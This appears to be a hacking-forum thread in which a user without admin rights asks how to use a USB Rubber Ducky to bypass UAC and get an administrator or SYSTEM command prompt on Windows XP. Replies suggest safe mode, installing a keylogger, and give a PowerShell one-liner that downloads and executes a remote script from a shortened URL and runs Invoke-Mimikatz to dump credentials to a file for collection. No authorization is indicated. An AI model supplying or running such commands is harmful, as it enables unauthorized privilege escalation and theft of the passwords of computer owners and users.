How to bypass uac and get admin cmd on xp with ducky?

BlackC1p3r

I don't recall any payload.. but you'll need an admin account or his pwd to run cmd with admin rights.

To get the password you could try the mimikatz payload.

My main problem here is that first I dont have admin and I am trying to either get admin cmd and run mimikatz or add another user with admin cmd even system would work but I am stuck here because I dont have access to the admin account and the USB Rubber Ducky runs with the privleges of the currently loged in user

• 4 weeks later...

Scratch the mimikatz part i could care less about mimikatz in my situation its not relevant all I really need is Admin or System Command Prompt access

There are a few solutions to your problem. One of these solutions is booting into "safe mode" and using a command prompt from there. Another one is to install some sort of keylogger, which is less desirable. Finally, I personally suggest finding a computer with an admin user on it, then use a ducky, open up PowerShell (run as Administrator) and type in the following:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" >> C:\output.txt 
Where C:\output.txt is, change it to a different path, one where the ducky can copy the .txt file to afterwards.

Hope this helps!